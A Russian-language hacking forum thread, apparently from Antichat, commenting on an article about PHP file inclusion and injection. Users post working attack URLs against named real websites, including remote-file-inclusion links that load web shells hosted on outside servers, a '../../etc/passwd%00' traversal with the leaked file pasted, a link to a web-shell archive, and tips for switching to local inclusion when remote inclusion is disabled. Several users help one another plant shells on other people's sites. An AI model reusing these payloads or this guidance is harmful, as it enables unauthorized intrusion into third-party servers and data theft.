Авторские статьи php injection

Discussion in 'Статьи' started by GreenBear, 24 Dec 2005.

  1. BlackDog

    BlackDog Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    53
    Likes Received:
    19
    Reputations:
    -8
    хм...... лан... пасиб....
     
  2. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    736
    Likes Received:
    268
    Reputations:
    59
    BlackDog веб шелл ето скрипт чаще на PHP для управления своим\чужим сайтом\сервером.
    шеллы можеш запускать на чужиш сайтах через php-ij (как ето делается я попоробовал обьясить ТУТ )
    изучай!!!!
    Вот скачай етот АРХИВ там подборка веб шеллов на любой вкус. Удачи
     
    #22 Zitt, 11 Aug 2006
    Last edited: 12 Aug 2006
  3. Марсеанчег

    Joined:
    29 Aug 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    хм...вот что у меня выводится в адресную строку http://blablabla:82/?mod=lookbook

    Вот код функции которая производит инклуд

    PHP:
    function std_execute_mod$mod_name$mod_function )
    {
        
    $mod_name str_replace'.php'''$mod_name );

        require_once( 
    $GLOBALS['g_dir_mod'] . $mod_name '.php' );
        eval( 
    '$out=' $mod_name '_' $mod_function ';' );

        return 
    $out;
    }
    $GLOBALS['g_dir_mod'] - тут папка mod

    можно ли как-то сделать пхп инъекцию?
     
  4. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    http://www.eurogym.ru/index.php?lang_id=0&content_id=+11&p_content_id=0&sitemap=0&extfilename=http://www.google.com
    гы...
    осваиваемся потихоньку =)
     
  5. 853069

    853069 Banned

    Joined:
    3 Aug 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    -21
    Панки, залилть вы можете расказат ькак? Я только вижу шел который работает через их инклуд, на моем сервере шел. Я хочу залить на их.
     
  6. DEMIX

    DEMIX Elder - Старейшина

    Joined:
    17 Jun 2007
    Messages:
    42
    Likes Received:
    5
    Reputations:
    0
    Статья прикольная. У меня вопрос вот например я увидел на форуме вот такой "php injection" - http://блаблабла/main.php?page=../../../../etc/passwd%00

    Открываю и вижу: ../../../../etc/passwdroot:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lpx:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var//mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:eek:perator:/root:/sbin/nologin

    И еще очень много таково.
    Насколько я понимаю, то мы зашли в корневую директорию сайта, перешли в папку "etc" и открыли файл "passwd". Если ошибаюсь то поправьте. Но я не понял что мы увидели в этом файле??? Разъясните пожалуйста.
     
  7. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Я уже отвечал на этот вопрос на форуме, вобщем применительно к локальному инклюду вот:
     
  8. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    Не в корневую директорию сайта а сервера, в данном случае это *Nix Os (как сказал Scipio)
     
  9. Sorx

    Sorx New Member

    Joined:
    21 Nov 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    у меня вопрос по Web-shell.
    Я использую Web-shell CIH.[ms] открываю его с помощю php-injection.
    Но при попытке чтото зделать шел просто перезагружаеться и не выполняет никаких команд =( (_http://www.an-invest.ru/?id=http://poni-shell.nm.ru/sss) Можете подсказать вчем проблема ? буду очень благодарен.
     
  10. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Попробуй другой шелл
    У меня всё нормально
     
  11. Sorx

    Sorx New Member

    Joined:
    21 Nov 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Таже ситуация перепробывал кучу веб-шєлов они грузяться показывают каталог с файлами а когда я хочу загрузить или перейти в другую папку они просто перезагружаються и опять показуют тотже каталог =(
     
  12. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    на nm.ru вроде выполняются PHP (не уверен)
    вот
    http://www.an-invest.ru/?id=http://ziroday.narod.ru/antichat
    правда папок на запись там нет)
     
  13. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Я хотел бы еще сказать насчет терминологии:
    все таки статья про php инклюдинг, а не про php инъекцию
    php including - это подключение файлов, а
    php injection - это внедрение php кода

    например чтение /etc/passwd - никак не может быть инъекцией, т.к. никакого php кода не выполняется

    а php injection это исполнение php комманд или кода ну допустим через eval или preg_replace т.д.
     
  14. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Посмотрел бы вначале, когда статья была написана.

    P.S. PHP Include - это и есть PHP Injection (один из видов)
     
    1 person likes this.
  15. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    2NOmeR1 Я не думаю, что терминология со временем сильно изменилась, к тому же я не откапывал статью в недрах ачата, а ссылка на нее висела на головной странице форума

    а насчет:
    ну может ты и прав, но сразу вспоминается аналогия:
     
  16. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    что ты к словам придрался. малоли кто как говорят. тут суть ясна.
     
  17. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Да я вобщем то не придирался, я же не пишу срочно исправьте название, или афффтар не прав, просто написал насчет терминологии, да и то для меня это непринципиально,потому что как ты сказал:
     
  18. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    помню с Нитроксом спорил на эту темы
    Вообще то инкдуинг - это именно include() или require(), ну я так считаю =)
     
  19. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    че? какие еще линии? наркоман чтоле.

    не получится у тебя в случае если урл акцес дизейблид.. тогда при меджик квоутс офф можешь локальные файлы подрубать. если же и они врублены, то тебе не повезло
     
  20. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    Не ну я конешно еше мало чё понимаю и етого неотрицаю...
    Имел ввиду я ето
    если незаметил то в конце написано on line 3 (ето я и имел ввиду)
    а в моём варианте 63
    нашёт етого можно поподробней а тоя чето неочень понял :confused:
    запрещён инклуд удалённых файлов, т.е вида (http://site/shell.php) а можно только подключать локальные (используя либо полный путь, либо отностительный) При выключенном параметре меджик квоутс кавычки не слэшируются, поэтому их можно использовать при указании полного пути подключаемого файла. Надеюсь понятно объяснил. -=lebed=-
    ЗЫ попрошу неназывать мя наркаманом,ето не правда:D
     
    #40 warlok, 10 Mar 2008
    Last edited by a moderator: 10 Mar 2008